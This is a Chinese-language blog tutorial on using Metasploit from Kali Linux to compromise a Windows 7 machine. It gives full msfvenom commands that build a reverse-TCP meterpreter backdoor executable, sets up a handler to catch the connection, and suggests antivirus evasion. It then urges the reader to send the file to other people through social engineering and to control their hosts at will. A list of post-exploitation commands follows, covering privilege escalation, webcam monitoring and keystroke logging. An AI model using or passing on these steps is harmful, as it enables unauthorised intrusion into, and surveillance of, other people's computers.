Metasploit

metasploit 是一款开源的安全漏洞检测工具

渗透测试的操作系统

无需赘言,kali Linux发行版是目前最流行的安全操作系统;基于Debian的操作系统附带了600多个预安装的测试工具。这些多功能工具定期更新,可用于不同平台,如ARM和VMware。作为顶级黑客操作系统提供了一个实时引导功能,为漏洞检测提供了一个完美的环境。
下载Kali Linux:https://www.kali.org/downloads/

MS

先在kali上制作一个后门程序。文件名自定义.(后缀不能漏):(名称).exe 

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o openme.exe

#本地监听地址及端口号:10.10.10.12850000  

为生成的文件 openme.exe 赋予可执行的权限,如果有必要可以对该文件执行免杀

命令:

chmod 777 openme.exe 

打开msf,加载exploit/multi/handler模块,同时设置本地主机地址,本地端口

命令:

msfconsole  

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 10.10.10.128

msf exploit(handler) > set lport 50000

开始执行渗透攻击并监听

命令:

 msf exploit(handler) > exploit -z -j

此时,你可以将文件发给其他人,利用社会工程学知识让别人在他的win7系统上打开该文件,那么你的目的就达到了

下面就是我在win7虚拟机中的文件,然后运行该文件

后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。

如图你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell,还有session信息。

命令:

msf exploit(handler) > sessions

msf exploit(handler) > sessions -i 1

meterpreter > shell

最后恭喜你就这样hacked别人的win7系统,如果你进一步学习Windows系统下的命令行操作,你就可以随意控制别人的主机了。

下面附上meterpreter常用的命令

getsystem        #会自动利用各种各样的系统漏洞来进行权限提升

migrate          #进程id进程迁移

background       #把当前的会话设置为背景,需要的时候在启用

getuid          #查看对方正在运行的用户

ps   #列出所有的进程

getpid      #返回运行meterpreterid

sysinfo       #产看系统信息和体系结构

shell    #切换到cmd的系统权限方式

exit   #退出shell会话返回meterpreter或终止meterpreter

getdesktop截取目标主机当前桌面会话窗口

run webcam -p /var/www    #/var/www目录监控目标主机的摄像头

keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

 

 

最新文章

  1. A new comer playing with Raspberry Pi 3B
  2. [自学总结] Unity5.3 API 之 Audio Mixer
  3. Git从入门到学会
  4. 程序员之路:以Android证道
  5. linux shell 流程控制(条件if,循环【for,while】,选择【case】语句实例 --转载
  6. Oracle存储过程中异步调用的实际操作步骤
  7. Jmeter html 报告中添加90% line time
  8. Facebook Graph API 接口请求
  9. quartz源码分析之深刻理解job,sheduler,calendar,trigger及listener之间的关系
  10. Jmeter mysql testing遇到的问题
  11. Alamofire网络库进阶教程
  12. 第一个windows 小游戏 贪吃蛇
  13. sqlplus连接oracle问题
  14. Java自学手记——泛型
  15. 【设计模式】module模式&&Revealing module (揭示)模式
  16. vue搭建项目前奏曲——vue-cli
  17. 改动hosts权限
  18. [JLOI 2014]松鼠的新家
  19. 【转载】tomcat+nginx+redis实现均衡负载、session共享(二)
  20. webpack code splitting

热门文章

  1. C# 运算符和类型强制转换(6) 持续更新
  2. metal sample code
  3. Java中的数据结构通俗易懂的介绍
  4. Can't install '*' from pristine store, because no checksum is recorded for this file
  5. Verilog状态机使用技巧
  6. HDU 5527 Too Rich ( 15长春区域赛 A 、可贪心的凑硬币问题 )
  7. python 找出数组重复的元素
  8. 手把手教你设置MongoDB密码
  9. Linux 常用命令安装
  10. Ubuntu18.04 server安装步骤